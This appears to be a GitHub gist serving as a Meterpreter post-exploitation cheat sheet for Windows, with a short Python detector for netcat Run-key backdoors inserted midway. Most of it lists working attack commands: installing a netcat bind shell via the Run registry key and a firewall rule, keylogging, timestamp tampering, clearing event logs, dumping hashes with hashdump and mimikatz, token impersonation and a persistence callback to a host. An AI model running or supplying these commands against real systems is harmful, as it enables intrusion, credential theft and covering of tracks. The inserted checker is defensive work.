Created September 6, 2018 19:38
Gist: JPMonglis/a886662b9ebcd2044509567eb02d76ca
## msf netcat backdoor in persistence
netcat is included in metasploit

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 ## must have system rights

## registry key adding
echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc

## firewall config needs a shell with system auth
netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=443 dir=in action=allow program="C:\windows\system32\nc.exe"
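Added here as a defensive counterpart, not part of the gist: a small Python checker that parses `reg query` output for the Run key and flags values that launch a netcat-family binary or hand a program to its -e/-c option, reporting whether it listens and on which port. The sample output, binary names and flag patterns are constructed assumptions for the demo.

```python
import re

# Constructed sample of `reg query HKLM\...\Run` output (not captured from a real host).
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
    OneDrive    REG_SZ    "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
"""

# Heuristics for the backdoor shape above: a netcat-family binary, a listen flag
# (-l/-L, possibly clustered as in -Ldp), a port after -p, and a program given to -e/-c.
NETCAT_BINARY = re.compile(r"\b(?:nc|nc64|ncat|netcat)\.exe\b", re.IGNORECASE)
LISTEN_FLAG = re.compile(r"(?:^|\s)-[a-zA-Z]*[lL]")
PORT_FLAG = re.compile(r"(?:^|\s)-[a-zA-Z]*p\s+(\d{1,5})\b")
EXEC_FLAG = re.compile(r"(?:^|\s)(?:-[a-zA-Z]*[ec]|--(?:sh-)?exec)\s+(\S+)")


def parse_run_key(output):
    """Turn `reg query` lines ('<name>    <REG_type>    <data>') into dicts; header/blank lines are skipped."""
    entries = []
    for line in output.splitlines():
        parts = re.split(r"\s{2,}", line.strip())
        if len(parts) == 3 and parts[1].startswith("REG_"):
            entries.append({"name": parts[0], "type": parts[1], "data": parts[2]})
    return entries


def find_backdoor_entries(output):
    """Return Run-key values that run netcat or pass a program to netcat's -e/-c, with listener details."""
    findings = []
    for entry in parse_run_key(output):
        data = entry["data"]
        spawns = EXEC_FLAG.search(data)
        if not (NETCAT_BINARY.search(data) or spawns):
            continue  # ordinary autostart entry
        port = PORT_FLAG.search(data)
        findings.append({
            "name": entry["name"],
            "data": data,
            "listener": bool(LISTEN_FLAG.search(data)),
            "port": int(port.group(1)) if port else None,
            "spawns": spawns.group(1) if spawns else None,
        })
    return findings


if __name__ == "__main__":
    for f in find_backdoor_entries(SAMPLE_RUN_KEY):
        print(f"[!] Run value {f['name']!r}: listener={f['listener']} port={f['port']} spawns={f['spawns']}")
```

Feed it the real output of `reg query` on the Run key (HKLM and HKCU) and cross-check any hit against inbound allow rules from `netsh advfirewall firewall show rule name=all`.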

## getgui
run getgui -h
getgui -u 'username' -p 'password' ## system privs {rdesktop -u username -p password IP}

## PORT FORWARDING
portfwd -h
portfwd add -l 443 -p 443 -r IP

## modify file timestamps
timestomp -h

## KEYLOGGING
keyscan_start
keyscan_dump
keyscan_stop

## persistence
persistence -U -i 15 -p 443 -r lhost

## mimikatz

load mimikatz
help mimikatz
mimikatz_command -f version
mimikatz_command -f blah::
kerberos
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
MSF wiki
search type:exploit platform:windows
search author:HDM type:exploit
search cve:1234
show exploits
grep vnc search type:exploit
mtpr> getuid
mtpr> getprivs
mtpr> ifconfig
mtpr> sysinfo
mtpr> hashdump
mtpr> download C:\\path\\to\\file
mtpr> upload fileToUpload C:\\path
mtpr> execute -f programToRun -i -H
mtpr> search -f test.*
mtpr> run post/windows/gather/enum_applications
mtpr> run post/windows/gather/enum_services
mtpr> getpid payload.exe
mtpr> migrate svchost.exe
mtpr> keyscan_start - dump - stop
mtpr> clearev
## Running incognito
mtpr> use incognito
mtpr> list_tokens
mtpr> impersonate_token user\\user
## Backdoor with netcat
mtpr> upload /usr/share/windows-binaries/nc.exe C:\\path\\to\\file\\
mtpr> reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
mtpr> reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\\path\\nc.exe -Ldp 445 -e cmd.exe'
mtpr> reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
shell> netsh advfirewall firewall add rule name="netcat" protocol=tcp localport=445 dir=in action=allow program="C:\\path\\to\\exe"
## Remote Desktop Access
mtpr> run getgui -u newUser -p newPass
rdesktop -u user -p pass 192.168.1.1
## Port Forwarding
mtpr> portfwd add -l 445 -p 445 -r 192.168.1.1
mtpr> run persistence -U -i 15 -p 443 -r 192.168.1.1
mtpr> use mimikatz
mtpr> mimikatz_command -f version
mtpr> mimikatz_command -f blah::
mtpr> kerberos
mtpr> help mimikatz
mtpr> mimikatz_command -f samdump::
mtpr> mimikatz_command -f samdump::bootkey